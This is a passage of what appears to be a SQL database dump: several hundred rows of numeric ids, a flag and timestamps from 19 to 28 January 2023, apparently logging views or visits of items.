15:30:59'),(68303,4524,1,'2023-01-19','2023-01-19 15:58:39'),(68304,3764,1,'2023-01-19','2023-01-19 16:10:16'),(68305,68,1,'2023-01-19','2023-01-19 16:26:53'),(68306,472,1,'2023-01-19','2023-01-19 16:48:12'),(68307,473,1,'2023-01-19','2023-01-19 16:48:30'),(68308,472,1,'2023-01-19','2023-01-19 16:48:35'),(68309,4514,1,'2023-01-19','2023-01-19 17:02:08'),(68310,5256,1,'2023-01-19','2023-01-19 17:04:00'),(68311,2159,1,'2023-01-19','2023-01-19 18:02:50'),(68312,4966,1,'2023-01-19','2023-01-19 18:28:00'),(68313,80,1,'2023-01-19','2023-01-19 18:28:06'),(68314,3063,1,'2023-01-19','2023-01-19 20:49:42'),(68315,3704,1,'2023-01-19','2023-01-19 21:42:53'),(68316,3027,1,'2023-01-19','2023-01-19 21:43:34'),(68317,4677,1,'2023-01-19','2023-01-19 22:03:23'),(68318,1722,1,'2023-01-19','2023-01-19 22:05:17'),(68319,1612,1,'2023-01-19','2023-01-19 22:09:58'),(68320,5101,1,'2023-01-19','2023-01-19 22:14:40'),(68321,2148,1,'2023-01-19','2023-01-19 22:28:44'),(68322,4694,1,'2023-01-19','2023-01-19 22:30:04'),(68323,2904,1,'2023-01-19','2023-01-19 22:36:31'),(68324,4712,1,'2023-01-19','2023-01-19 22:42:31'),(68325,4457,1,'2023-01-19','2023-01-19 22:52:04'),(68326,4681,1,'2023-01-19','2023-01-19 23:03:53'),(68327,1588,1,'2023-01-19','2023-01-19 23:19:34'),(68328,1612,1,'2023-01-20','2023-01-20 00:17:44'),(68329,4520,1,'2023-01-20','2023-01-20 00:48:10'),(68330,4703,1,'2023-01-20','2023-01-20 00:48:46'),(68331,3764,1,'2023-01-20','2023-01-20 02:46:55'),(68332,5256,1,'2023-01-20','2023-01-20 03:07:52'),(68333,5256,1,'2023-01-20','2023-01-20 03:48:21'),(68334,468,1,'2023-01-20','2023-01-20 04:38:30'),(68335,4738,1,'2023-01-20','2023-01-20 04:41:32'),(68336,1596,1,'2023-01-20','2023-01-20 05:21:35'),(68337,1741,1,'2023-01-20','2023-01-20 05:40:41'),(68338,2658,1,'2023-01-20','2023-01-20 05:48:45'),(68339,3226,1,'2023-01-20','2023-01-20 05:55:45'),(68340,4332,1,'2023-01-20','2023-01-20 06:06:09'),(68341,80,1,'2023-01-20','2023-01-20 06:17:25'),(68342,4681,1,'2023-01-20','2023-01-20 06:20:33'),(68343,3004,1,'2023-01-20','2023-01-20 07:18:38'),(68344,4348,1,'2023-01-20','2023-01-20 07:20:06'),(68345,4612,1,'2023-01-20','2023-01-20 07:21:17'),(68346,4960,1,'2023-01-20','2023-01-20 08:27:17'),(68347,1610,1,'2023-01-20','2023-01-20 09:26:30'),(68348,4976,1,'2023-01-20','2023-01-20 09:39:49'),(68349,4454,1,'2023-01-20','2023-01-20 09:40:42'),(68350,3004,1,'2023-01-20','2023-01-20 09:44:01'),(68351,2989,1,'2023-01-20','2023-01-20 09:45:10'),(68352,72,1,'2023-01-20','2023-01-20 09:49:41'),(68353,2989,1,'2023-01-20','2023-01-20 09:54:12'),(68354,4966,1,'2023-01-20','2023-01-20 10:23:57'),(68355,4966,1,'2023-01-20','2023-01-20 10:25:47'),(68356,1582,1,'2023-01-20','2023-01-20 10:42:03'),(68357,2503,1,'2023-01-20','2023-01-20 10:47:20'),(68358,80,1,'2023-01-20','2023-01-20 10:55:37'),(68359,1602,1,'2023-01-20','2023-01-20 12:24:14'),(68360,5163,1,'2023-01-20','2023-01-20 13:03:28'),(68361,4517,1,'2023-01-20','2023-01-20 13:57:42'),(68362,4950,1,'2023-01-20','2023-01-20 14:04:22'),(68363,3764,1,'2023-01-20','2023-01-20 14:56:22'),(68364,3764,1,'2023-01-20','2023-01-20 15:03:40'),(68365,1614,1,'2023-01-20','2023-01-20 15:26:16'),(68366,5163,1,'2023-01-20','2023-01-20 15:52:41'),(68367,1610,1,'2023-01-20','2023-01-20 16:12:55'),(68368,5080,1,'2023-01-20','2023-01-20 16:38:16'),(68369,1722,1,'2023-01-20','2023-01-20 16:58:40'),(68370,3313,1,'2023-01-20','2023-01-20 17:19:49'),(68371,1594,1,'2023-01-20','2023-01-20 17:51:26'),(68372,3249,1,'2023-01-20','2023-01-20 19:02:30'),(68373,4762,1,'2023-01-20','2023-01-20 19:23:12'),(68374,468,1,'2023-01-20','2023-01-20 19:38:20'),(68375,2911,1,'2023-01-20','2023-01-20 19:54:16'),(68376,4759,1,'2023-01-20','2023-01-20 21:24:05'),(68377,479,1,'2023-01-20','2023-01-20 21:54:44'),(68378,1872,1,'2023-01-20','2023-01-20 23:58:31'),(68379,4938,1,'2023-01-21','2023-01-21 00:00:49'),(68380,4938,1,'2023-01-21','2023-01-21 00:45:31'),(68381,2293,1,'2023-01-21','2023-01-21 01:30:46'),(68382,3267,1,'2023-01-21','2023-01-21 03:46:30'),(68383,483,1,'2023-01-21','2023-01-21 05:34:19'),(68384,1612,1,'2023-01-21','2023-01-21 06:28:43'),(68385,1612,1,'2023-01-21','2023-01-21 08:02:54'),(68386,5131,1,'2023-01-21','2023-01-21 08:28:00'),(68387,108,1,'2023-01-21','2023-01-21 10:01:10'),(68388,89,1,'2023-01-21','2023-01-21 10:20:21'),(68389,1722,1,'2023-01-21','2023-01-21 10:33:34'),(68390,1722,1,'2023-01-21','2023-01-21 10:34:00'),(68391,4517,1,'2023-01-21','2023-01-21 10:54:47'),(68392,483,1,'2023-01-21','2023-01-21 11:34:06'),(68393,4709,1,'2023-01-21','2023-01-21 12:12:59'),(68394,1610,1,'2023-01-21','2023-01-21 13:05:11'),(68395,1610,1,'2023-01-21','2023-01-21 13:05:11'),(68396,1610,1,'2023-01-21','2023-01-21 13:05:14'),(68397,5134,1,'2023-01-21','2023-01-21 13:11:51'),(68398,5137,1,'2023-01-21','2023-01-21 13:12:19'),(68399,5134,1,'2023-01-21','2023-01-21 13:13:10'),(68400,4963,1,'2023-01-21','2023-01-21 15:17:43'),(68401,4963,1,'2023-01-21','2023-01-21 16:17:44'),(68402,4963,1,'2023-01-21','2023-01-21 16:17:52'),(68403,4963,1,'2023-01-21','2023-01-21 16:18:02'),(68404,4963,1,'2023-01-21','2023-01-21 16:39:41'),(68405,4697,1,'2023-01-21','2023-01-21 16:40:13'),(68406,4963,1,'2023-01-21','2023-01-21 17:42:39'),(68407,1728,1,'2023-01-21','2023-01-21 18:06:34'),(68408,4950,1,'2023-01-21','2023-01-21 18:13:24'),(68409,1606,1,'2023-01-21','2023-01-21 19:02:04'),(68410,1598,1,'2023-01-21','2023-01-21 19:15:52'),(68411,3764,1,'2023-01-21','2023-01-21 20:04:15'),(68412,5128,1,'2023-01-21','2023-01-21 20:19:40'),(68413,4341,1,'2023-01-21','2023-01-21 22:23:37'),(68414,4412,1,'2023-01-22','2023-01-22 00:02:36'),(68415,4966,1,'2023-01-22','2023-01-22 00:23:58'),(68416,3498,1,'2023-01-22','2023-01-22 02:56:08'),(68417,5256,1,'2023-01-22','2023-01-22 03:08:09'),(68418,3104,1,'2023-01-22','2023-01-22 03:26:05'),(68419,2956,1,'2023-01-22','2023-01-22 03:58:55'),(68420,2148,1,'2023-01-22','2023-01-22 04:12:22'),(68421,1544,1,'2023-01-22','2023-01-22 04:42:39'),(68422,1743,1,'2023-01-22','2023-01-22 04:56:07'),(68423,4457,1,'2023-01-22','2023-01-22 06:33:01'),(68424,1544,1,'2023-01-22','2023-01-22 08:59:42'),(68425,108,1,'2023-01-22','2023-01-22 12:56:08'),(68426,5037,1,'2023-01-22','2023-01-22 12:56:11'),(68427,4412,1,'2023-01-22','2023-01-22 13:11:41'),(68428,3104,1,'2023-01-22','2023-01-22 13:27:18'),(68429,483,1,'2023-01-22','2023-01-22 13:58:30'),(68430,1584,1,'2023-01-22','2023-01-22 14:26:18'),(68431,483,1,'2023-01-22','2023-01-22 14:29:44'),(68432,3781,1,'2023-01-22','2023-01-22 17:56:31'),(68433,1726,1,'2023-01-22','2023-01-22 18:05:16'),(68434,2395,1,'2023-01-22','2023-01-22 18:15:39'),(68435,1586,1,'2023-01-22','2023-01-22 18:22:08'),(68436,3251,1,'2023-01-22','2023-01-22 19:03:43'),(68437,2395,1,'2023-01-22','2023-01-22 19:41:25'),(68438,2293,1,'2023-01-22','2023-01-22 19:47:46'),(68439,68,1,'2023-01-22','2023-01-22 20:25:32'),(68440,5134,1,'2023-01-22','2023-01-22 20:26:26'),(68441,4963,1,'2023-01-22','2023-01-22 23:08:54'),(68442,2419,1,'2023-01-22','2023-01-22 23:39:01'),(68443,1594,1,'2023-01-23','2023-01-23 01:27:58'),(68444,5163,1,'2023-01-23','2023-01-23 01:36:52'),(68445,1602,1,'2023-01-23','2023-01-23 03:13:26'),(68446,5122,1,'2023-01-23','2023-01-23 05:14:44'),(68447,5125,1,'2023-01-23','2023-01-23 05:50:06'),(68448,1586,1,'2023-01-23','2023-01-23 06:06:43'),(68449,5037,1,'2023-01-23','2023-01-23 06:07:40'),(68450,2956,1,'2023-01-23','2023-01-23 06:43:10'),(68451,3251,1,'2023-01-23','2023-01-23 07:00:36'),(68452,4612,1,'2023-01-23','2023-01-23 07:11:56'),(68453,5122,1,'2023-01-23','2023-01-23 07:37:47'),(68454,1586,1,'2023-01-23','2023-01-23 09:17:57'),(68455,5256,1,'2023-01-23','2023-01-23 09:33:38'),(68456,2558,1,'2023-01-23','2023-01-23 10:21:20'),(68457,1614,1,'2023-01-23','2023-01-23 10:36:58'),(68458,87,1,'2023-01-23','2023-01-23 10:47:52'),(68459,4457,1,'2023-01-23','2023-01-23 10:59:28'),(68460,1602,1,'2023-01-23','2023-01-23 11:14:28'),(68461,1588,1,'2023-01-23','2023-01-23 11:27:59'),(68462,1588,1,'2023-01-23','2023-01-23 11:34:16'),(68463,76,1,'2023-01-23','2023-01-23 11:39:57'),(68464,72,1,'2023-01-23','2023-01-23 11:49:12'),(68465,4622,1,'2023-01-23','2023-01-23 11:50:41'),(68466,72,1,'2023-01-23','2023-01-23 11:50:55'),(68467,4576,1,'2023-01-23','2023-01-23 11:51:12'),(68468,4960,1,'2023-01-23','2023-01-23 13:18:32'),(68469,4944,1,'2023-01-23','2023-01-23 13:55:20'),(68470,1606,1,'2023-01-23','2023-01-23 15:23:02'),(68471,1602,1,'2023-01-23','2023-01-23 16:00:28'),(68472,1606,1,'2023-01-23','2023-01-23 16:15:21'),(68473,4301,1,'2023-01-23','2023-01-23 16:18:56'),(68474,3267,1,'2023-01-23','2023-01-23 16:34:22'),(68475,5157,1,'2023-01-23','2023-01-23 17:00:28'),(68476,3691,1,'2023-01-23','2023-01-23 17:07:26'),(68477,1586,1,'2023-01-23','2023-01-23 17:36:01'),(68478,3102,1,'2023-01-23','2023-01-23 18:01:27'),(68479,2297,1,'2023-01-23','2023-01-23 18:04:11'),(68480,1766,1,'2023-01-23','2023-01-23 18:07:57'),(68481,1610,1,'2023-01-23','2023-01-23 18:09:49'),(68482,1610,1,'2023-01-23','2023-01-23 18:09:51'),(68483,1586,1,'2023-01-23','2023-01-23 18:33:16'),(68484,4966,1,'2023-01-23','2023-01-23 19:11:04'),(68485,3691,1,'2023-01-23','2023-01-23 19:50:32'),(68486,5080,1,'2023-01-23','2023-01-23 21:46:23'),(68487,4436,1,'2023-01-23','2023-01-23 23:07:53'),(68488,4238,1,'2023-01-24','2023-01-24 00:47:42'),(68489,2769,1,'2023-01-24','2023-01-24 02:43:00'),(68490,2769,1,'2023-01-24','2023-01-24 02:44:04'),(68491,1600,1,'2023-01-24','2023-01-24 03:15:37'),(68492,80,1,'2023-01-24','2023-01-24 03:37:40'),(68493,76,1,'2023-01-24','2023-01-24 03:48:53'),(68494,3267,1,'2023-01-24','2023-01-24 03:50:35'),(68495,1610,1,'2023-01-24','2023-01-24 03:53:07'),(68496,5037,1,'2023-01-24','2023-01-24 04:05:10'),(68497,3691,1,'2023-01-24','2023-01-24 04:27:05'),(68498,2609,1,'2023-01-24','2023-01-24 04:37:37'),(68499,3752,1,'2023-01-24','2023-01-24 04:54:03'),(68500,4436,1,'2023-01-24','2023-01-24 05:55:23'),(68501,2159,1,'2023-01-24','2023-01-24 07:03:03'),(68502,1724,1,'2023-01-24','2023-01-24 07:28:47'),(68503,2609,1,'2023-01-24','2023-01-24 08:29:05'),(68504,3781,1,'2023-01-24','2023-01-24 08:33:49'),(68505,472,1,'2023-01-24','2023-01-24 08:38:42'),(68506,5163,1,'2023-01-24','2023-01-24 09:25:59'),(68507,5033,1,'2023-01-24','2023-01-24 09:26:38'),(68508,4301,1,'2023-01-24','2023-01-24 09:49:42'),(68509,1600,1,'2023-01-24','2023-01-24 09:59:17'),(68510,4963,1,'2023-01-24','2023-01-24 10:02:35'),(68511,4944,1,'2023-01-24','2023-01-24 10:09:55'),(68512,1770,1,'2023-01-24','2023-01-24 11:20:04'),(68513,1588,1,'2023-01-24','2023-01-24 11:20:37'),(68514,4765,1,'2023-01-24','2023-01-24 11:47:16'),(68515,4874,1,'2023-01-24','2023-01-24 12:14:32'),(68516,5080,1,'2023-01-24','2023-01-24 12:49:54'),(68517,5080,1,'2023-01-24','2023-01-24 12:49:55'),(68518,4612,1,'2023-01-24','2023-01-24 12:57:56'),(68519,3764,1,'2023-01-24','2023-01-24 13:09:04'),(68520,3764,1,'2023-01-24','2023-01-24 13:30:12'),(68521,1544,1,'2023-01-24','2023-01-24 13:39:18'),(68522,4966,1,'2023-01-24','2023-01-24 13:50:22'),(68523,4966,1,'2023-01-24','2023-01-24 13:50:40'),(68524,1600,1,'2023-01-24','2023-01-24 14:17:33'),(68525,1600,1,'2023-01-24','2023-01-24 14:18:50'),(68526,4612,1,'2023-01-24','2023-01-24 14:35:28'),(68527,4765,1,'2023-01-24','2023-01-24 14:40:45'),(68528,4765,1,'2023-01-24','2023-01-24 14:41:36'),(68529,4802,1,'2023-01-24','2023-01-24 14:51:38'),(68530,4747,1,'2023-01-24','2023-01-24 15:15:09'),(68531,1604,1,'2023-01-24','2023-01-24 15:38:55'),(68532,4457,1,'2023-01-24','2023-01-24 15:43:56'),(68533,3764,1,'2023-01-24','2023-01-24 15:59:04'),(68534,4977,1,'2023-01-24','2023-01-24 16:04:00'),(68535,5071,1,'2023-01-24','2023-01-24 16:47:12'),(68536,1610,1,'2023-01-24','2023-01-24 16:48:01'),(68537,4976,1,'2023-01-24','2023-01-24 17:16:43'),(68538,5119,1,'2023-01-24','2023-01-24 17:41:13'),(68539,2804,1,'2023-01-24','2023-01-24 18:00:42'),(68540,3781,1,'2023-01-24','2023-01-24 18:12:00'),(68541,3781,1,'2023-01-24','2023-01-24 18:12:56'),(68542,3752,1,'2023-01-24','2023-01-24 18:45:50'),(68543,91,1,'2023-01-24','2023-01-24 18:49:31'),(68544,1610,1,'2023-01-24','2023-01-24 19:08:41'),(68545,76,1,'2023-01-24','2023-01-24 19:12:08'),(68546,1768,1,'2023-01-24','2023-01-24 19:30:34'),(68547,3290,1,'2023-01-24','2023-01-24 19:57:37'),(68548,68,1,'2023-01-24','2023-01-24 21:17:19'),(68549,3229,1,'2023-01-24','2023-01-24 21:32:55'),(68550,4412,1,'2023-01-24','2023-01-24 22:15:11'),(68551,2419,1,'2023-01-24','2023-01-24 22:45:19'),(68552,1544,1,'2023-01-25','2023-01-25 00:06:52'),(68553,468,1,'2023-01-25','2023-01-25 00:49:52'),(68554,1544,1,'2023-01-25','2023-01-25 01:14:16'),(68555,1544,1,'2023-01-25','2023-01-25 01:16:19'),(68556,1602,1,'2023-01-25','2023-01-25 01:38:42'),(68557,3290,1,'2023-01-25','2023-01-25 02:07:26'),(68558,68,1,'2023-01-25','2023-01-25 02:14:11'),(68559,68,1,'2023-01-25','2023-01-25 02:14:21'),(68560,80,1,'2023-01-25','2023-01-25 02:14:29'),(68561,68,1,'2023-01-25','2023-01-25 02:14:34'),(68562,1722,1,'2023-01-25','2023-01-25 02:15:52'),(68563,1602,1,'2023-01-25','2023-01-25 02:16:55'),(68564,4963,1,'2023-01-25','2023-01-25 02:18:33'),(68565,89,1,'2023-01-25','2023-01-25 02:54:18'),(68566,4335,1,'2023-01-25','2023-01-25 03:32:58'),(68567,5268,1,'2023-01-25','2023-01-25 03:40:15'),(68568,5268,1,'2023-01-25','2023-01-25 03:40:16'),(68569,2457,1,'2023-01-25','2023-01-25 03:58:07'),(68570,1588,1,'2023-01-25','2023-01-25 03:59:53'),(68571,3030,1,'2023-01-25','2023-01-25 04:05:26'),(68572,1743,1,'2023-01-25','2023-01-25 04:39:28'),(68573,2617,1,'2023-01-25','2023-01-25 05:13:06'),(68574,4870,1,'2023-01-25','2023-01-25 05:20:06'),(68575,3742,1,'2023-01-25','2023-01-25 05:53:51'),(68576,4420,1,'2023-01-25','2023-01-25 06:35:00'),(68577,1743,1,'2023-01-25','2023-01-25 08:38:47'),(68578,1586,1,'2023-01-25','2023-01-25 08:48:40'),(68579,1600,1,'2023-01-25','2023-01-25 09:11:58'),(68580,2989,1,'2023-01-25','2023-01-25 09:12:26'),(68581,1600,1,'2023-01-25','2023-01-25 09:12:46'),(68582,2457,1,'2023-01-25','2023-01-25 09:13:15'),(68583,1600,1,'2023-01-25','2023-01-25 09:13:21'),(68584,5101,1,'2023-01-25','2023-01-25 09:24:06'),(68585,1544,1,'2023-01-25','2023-01-25 10:05:19'),(68586,2297,1,'2023-01-25','2023-01-25 10:36:22'),(68587,1600,1,'2023-01-25','2023-01-25 11:09:53'),(68588,91,1,'2023-01-25','2023-01-25 11:52:35'),(68589,5163,1,'2023-01-25','2023-01-25 11:58:05'),(68590,1614,1,'2023-01-25','2023-01-25 11:59:19'),(68591,1614,1,'2023-01-25','2023-01-25 12:01:11'),(68592,1594,1,'2023-01-25','2023-01-25 12:01:59'),(68593,4963,1,'2023-01-25','2023-01-25 12:42:23'),(68594,1612,1,'2023-01-25','2023-01-25 13:31:13'),(68595,1588,1,'2023-01-25','2023-01-25 14:39:43'),(68596,1588,1,'2023-01-25','2023-01-25 14:40:16'),(68597,1608,1,'2023-01-25','2023-01-25 14:53:06'),(68598,4944,1,'2023-01-25','2023-01-25 15:39:05'),(68599,4944,1,'2023-01-25','2023-01-25 15:39:11'),(68600,2297,1,'2023-01-25','2023-01-25 15:59:03'),(68601,3664,1,'2023-01-25','2023-01-25 15:59:22'),(68602,1602,1,'2023-01-25','2023-01-25 16:17:20'),(68603,1600,1,'2023-01-25','2023-01-25 16:28:08'),(68604,2309,1,'2023-01-25','2023-01-25 16:42:45'),(68605,4391,1,'2023-01-25','2023-01-25 17:15:10'),(68606,4930,1,'2023-01-25','2023-01-25 17:27:40'),(68607,91,1,'2023-01-25','2023-01-25 17:28:06'),(68608,3752,1,'2023-01-25','2023-01-25 17:56:36'),(68609,474,1,'2023-01-25','2023-01-25 19:21:30'),(68610,1600,1,'2023-01-25','2023-01-25 19:57:40'),(68611,3764,1,'2023-01-25','2023-01-25 20:49:44'),(68612,2751,1,'2023-01-25','2023-01-25 20:55:39'),(68613,4457,1,'2023-01-25','2023-01-25 20:56:33'),(68614,4960,1,'2023-01-25','2023-01-25 21:19:47'),(68615,89,1,'2023-01-25','2023-01-25 21:20:56'),(68616,4960,1,'2023-01-25','2023-01-25 21:21:53'),(68617,4930,1,'2023-01-25','2023-01-25 21:22:10'),(68618,68,1,'2023-01-25','2023-01-25 21:22:57'),(68619,1544,1,'2023-01-25','2023-01-25 21:51:49'),(68620,5054,1,'2023-01-25','2023-01-25 23:20:05'),(68621,3777,1,'2023-01-25','2023-01-25 23:54:48'),(68622,4976,1,'2023-01-26','2023-01-26 00:03:53'),(68623,4938,1,'2023-01-26','2023-01-26 00:13:21'),(68624,4977,1,'2023-01-26','2023-01-26 00:33:43'),(68625,1610,1,'2023-01-26','2023-01-26 00:44:31'),(68626,4753,1,'2023-01-26','2023-01-26 01:03:43'),(68627,4983,1,'2023-01-26','2023-01-26 01:33:43'),(68628,4963,1,'2023-01-26','2023-01-26 01:34:33'),(68629,4988,1,'2023-01-26','2023-01-26 01:56:19'),(68630,1877,1,'2023-01-26','2023-01-26 02:10:16'),(68631,4768,1,'2023-01-26','2023-01-26 02:25:09'),(68632,4436,1,'2023-01-26','2023-01-26 02:46:22'),(68633,68,1,'2023-01-26','2023-01-26 02:47:18'),(68634,474,1,'2023-01-26','2023-01-26 03:03:46'),(68635,487,1,'2023-01-26','2023-01-26 03:30:43'),(68636,4980,1,'2023-01-26','2023-01-26 03:48:45'),(68637,4238,1,'2023-01-26','2023-01-26 05:20:33'),(68638,4759,1,'2023-01-26','2023-01-26 05:50:56'),(68639,4966,1,'2023-01-26','2023-01-26 06:20:02'),(68640,3034,1,'2023-01-26','2023-01-26 06:34:11'),(68641,473,1,'2023-01-26','2023-01-26 06:41:52'),(68642,89,1,'2023-01-26','2023-01-26 07:01:31'),(68643,4983,1,'2023-01-26','2023-01-26 07:51:28'),(68644,4753,1,'2023-01-26','2023-01-26 08:33:33'),(68645,1608,1,'2023-01-26','2023-01-26 08:48:25'),(68646,5163,1,'2023-01-26','2023-01-26 08:49:17'),(68647,91,1,'2023-01-26','2023-01-26 09:01:53'),(68648,2297,1,'2023-01-26','2023-01-26 09:32:31'),(68649,1877,1,'2023-01-26','2023-01-26 09:49:30'),(68650,2704,1,'2023-01-26','2023-01-26 10:11:50'),(68651,473,1,'2023-01-26','2023-01-26 10:16:24'),(68652,4301,1,'2023-01-26','2023-01-26 10:22:13'),(68653,5163,1,'2023-01-26','2023-01-26 10:58:18'),(68654,470,1,'2023-01-26','2023-01-26 11:00:12'),(68655,3034,1,'2023-01-26','2023-01-26 11:03:15'),(68656,1728,1,'2023-01-26','2023-01-26 11:20:58'),(68657,487,1,'2023-01-26','2023-01-26 11:50:13'),(68658,4301,1,'2023-01-26','2023-01-26 12:05:08'),(68659,1588,1,'2023-01-26','2023-01-26 12:40:57'),(68660,1588,1,'2023-01-26','2023-01-26 12:44:29'),(68661,3271,1,'2023-01-26','2023-01-26 12:51:13'),(68662,5163,1,'2023-01-26','2023-01-26 12:58:01'),(68663,5163,1,'2023-01-26','2023-01-26 12:58:46'),(68664,5080,1,'2023-01-26','2023-01-26 13:18:44'),(68665,5080,1,'2023-01-26','2023-01-26 13:20:40'),(68666,5080,1,'2023-01-26','2023-01-26 13:20:53'),(68667,5080,1,'2023-01-26','2023-01-26 13:20:56'),(68668,4238,1,'2023-01-26','2023-01-26 13:26:45'),(68669,3102,1,'2023-01-26','2023-01-26 13:38:19'),(68670,3102,1,'2023-01-26','2023-01-26 13:47:31'),(68671,4980,1,'2023-01-26','2023-01-26 14:00:54'),(68672,5163,1,'2023-01-26','2023-01-26 14:01:42'),(68673,5163,1,'2023-01-26','2023-01-26 14:05:24'),(68674,3781,1,'2023-01-26','2023-01-26 14:25:29'),(68675,3102,1,'2023-01-26','2023-01-26 14:26:16'),(68676,5163,1,'2023-01-26','2023-01-26 14:37:03'),(68677,80,1,'2023-01-26','2023-01-26 14:37:24'),(68678,4963,1,'2023-01-26','2023-01-26 15:26:05'),(68679,4520,1,'2023-01-26','2023-01-26 15:58:22'),(68680,1588,1,'2023-01-26','2023-01-26 16:00:29'),(68681,4960,1,'2023-01-26','2023-01-26 16:40:09'),(68682,2309,1,'2023-01-26','2023-01-26 16:46:59'),(68683,4416,1,'2023-01-26','2023-01-26 16:53:57'),(68684,470,1,'2023-01-26','2023-01-26 17:20:54'),(68685,4963,1,'2023-01-26','2023-01-26 17:25:13'),(68686,5005,1,'2023-01-26','2023-01-26 18:17:11'),(68687,1586,1,'2023-01-26','2023-01-26 18:21:21'),(68688,87,1,'2023-01-26','2023-01-26 18:22:40'),(68689,473,1,'2023-01-26','2023-01-26 18:23:26'),(68690,4301,1,'2023-01-26','2023-01-26 18:27:59'),(68691,470,1,'2023-01-26','2023-01-26 18:32:19'),(68692,1594,1,'2023-01-26','2023-01-26 18:42:09'),(68693,89,1,'2023-01-26','2023-01-26 19:05:56'),(68694,80,1,'2023-01-26','2023-01-26 19:14:17'),(68695,4436,1,'2023-01-26','2023-01-26 19:40:02'),(68696,487,1,'2023-01-26','2023-01-26 21:17:02'),(68697,5163,1,'2023-01-26','2023-01-26 22:04:07'),(68698,570,1,'2023-01-26','2023-01-26 22:17:47'),(68699,1602,1,'2023-01-26','2023-01-26 22:54:24'),(68700,1596,1,'2023-01-26','2023-01-26 22:59:28'),(68701,335,1,'2023-01-26','2023-01-26 23:23:08'),(68702,4412,1,'2023-01-26','2023-01-26 23:52:29'),(68703,5259,1,'2023-01-26','2023-01-26 23:55:57'),(68704,5071,1,'2023-01-26','2023-01-26 23:56:46'),(68705,91,1,'2023-01-26','2023-01-26 23:57:21'),(68706,5259,1,'2023-01-26','2023-01-26 23:58:26'),(68707,5259,1,'2023-01-26','2023-01-26 23:58:26'),(68708,4960,1,'2023-01-27','2023-01-27 00:09:06'),(68709,4960,1,'2023-01-27','2023-01-27 00:10:02'),(68710,3781,1,'2023-01-27','2023-01-27 00:15:14'),(68711,4963,1,'2023-01-27','2023-01-27 00:39:13'),(68712,4457,1,'2023-01-27','2023-01-27 00:46:14'),(68713,1728,1,'2023-01-27','2023-01-27 01:24:34'),(68714,5253,1,'2023-01-27','2023-01-27 01:32:45'),(68715,472,1,'2023-01-27','2023-01-27 01:48:28'),(68716,4412,1,'2023-01-27','2023-01-27 02:13:26'),(68717,1596,1,'2023-01-27','2023-01-27 02:22:36'),(68718,474,1,'2023-01-27','2023-01-27 02:37:05'),(68719,476,1,'2023-01-27','2023-01-27 02:38:09'),(68720,89,1,'2023-01-27','2023-01-27 03:05:13'),(68721,479,1,'2023-01-27','2023-01-27 03:11:17'),(68722,472,1,'2023-01-27','2023-01-27 03:59:25'),(68723,570,1,'2023-01-27','2023-01-27 04:00:22'),(68724,5163,1,'2023-01-27','2023-01-27 04:22:26'),(68725,1582,1,'2023-01-27','2023-01-27 04:30:13'),(68726,1734,1,'2023-01-27','2023-01-27 04:36:53'),(68727,3092,1,'2023-01-27','2023-01-27 04:58:48'),(68728,5248,1,'2023-01-27','2023-01-27 05:46:52'),(68729,5248,1,'2023-01-27','2023-01-27 05:46:58'),(68730,1594,1,'2023-01-27','2023-01-27 05:47:26'),(68731,3278,1,'2023-01-27','2023-01-27 06:13:43'),(68732,1582,1,'2023-01-27','2023-01-27 08:24:53'),(68733,4966,1,'2023-01-27','2023-01-27 08:28:00'),(68734,4966,1,'2023-01-27','2023-01-27 08:28:07'),(68735,1582,1,'2023-01-27','2023-01-27 08:45:29'),(68736,5256,1,'2023-01-27','2023-01-27 09:30:10'),(68737,5268,1,'2023-01-27','2023-01-27 09:33:09'),(68738,4612,1,'2023-01-27','2023-01-27 10:37:56'),(68739,4960,1,'2023-01-27','2023-01-27 10:47:48'),(68740,1594,1,'2023-01-27','2023-01-27 10:53:06'),(68741,3004,1,'2023-01-27','2023-01-27 11:04:40'),(68742,4424,1,'2023-01-27','2023-01-27 11:31:47'),(68743,1722,1,'2023-01-27','2023-01-27 11:32:35'),(68744,5062,1,'2023-01-27','2023-01-27 11:44:18'),(68745,1588,1,'2023-01-27','2023-01-27 11:48:17'),(68746,1600,1,'2023-01-27','2023-01-27 13:16:40'),(68747,2609,1,'2023-01-27','2023-01-27 13:20:12'),(68748,484,1,'2023-01-27','2023-01-27 14:10:51'),(68749,4988,1,'2023-01-27','2023-01-27 15:08:03'),(68750,4323,1,'2023-01-27','2023-01-27 15:39:57'),(68751,1594,1,'2023-01-27','2023-01-27 16:29:16'),(68752,4960,1,'2023-01-27','2023-01-27 16:58:47'),(68753,4960,1,'2023-01-27','2023-01-27 17:12:15'),(68754,1600,1,'2023-01-27','2023-01-27 17:13:41'),(68755,469,1,'2023-01-27','2023-01-27 17:47:47'),(68756,2297,1,'2023-01-27','2023-01-27 17:59:35'),(68757,2809,1,'2023-01-27','2023-01-27 18:15:20'),(68758,1707,1,'2023-01-27','2023-01-27 18:35:55'),(68759,3257,1,'2023-01-27','2023-01-27 19:16:04'),(68760,2809,1,'2023-01-27','2023-01-27 19:35:00'),(68761,87,1,'2023-01-27','2023-01-27 19:35:26'),(68762,2751,1,'2023-01-27','2023-01-27 21:08:23'),(68763,1608,1,'2023-01-27','2023-01-27 23:04:09'),(68764,1544,1,'2023-01-27','2023-01-27 23:10:59'),(68765,80,1,'2023-01-28','2023-01-28 01:49:16'),(68766,80,1,'2023-01-28','2023-01-28 05:28:05'),(68767,4457,1,'2023-01-28','2023-01-28 05:37:10'),(68768,4944,1,'2023-01-28','2023-01-28 05:56:32'),(68769,4944,1,'2023-01-28','2023-01-28 05:59:03'),(68770,1586,1,'2023-01-28','2023-01-28 06:09:12'),(68771,1586,1,'2023-01-28','2023-01-28 07:30:35'),(68772,4747,1,'2023-01-28','2023-01-28 08:02:59'),(68773,2159,1,'2023-01-28','2023-01-28 08:26:51'),(68774,2159,1,'2023-01-28','2023-01-28 08:30:10'),(68775,2159,1,'2023-01-28','2023-01-28 08:31:36'),(68776,4520,1,'2023-01-28','2023-01-28 08:35:14'),(68777,4416,1,'2023-01-28','2023-01-28 09:04:24'),(68778,1870,1,'2023-01-28','2023-01-28 09:39:58'),(68779,3764,1,'2023-01-28','2023-01-28 10:17:31'),(68780,2904,1,'2023-01-28','2023-01-28 11:07:34'),(68781,4870,1,'2023-01-28','2023-01-28 11:54:34'),(68782,3781,1,'2023-01-28','2023-01-28 12:32:39'),(68783,5163,1,'2023-01-28','2023-01-28 12:53:34'),(68784,4930,1,'2023-01-28','2023-01-28 13:03:01'),(68785,1772,1,'2023-01-28','2023-01-28 14:34:07'),(68786,1588,1,'2023-01-28','2023-01-28 14:40:39'),(68787,80,1,'2023-01-28','2023-01-28 16:27:30'),(68788,2775,1,'2023-01-28','2023-01-28 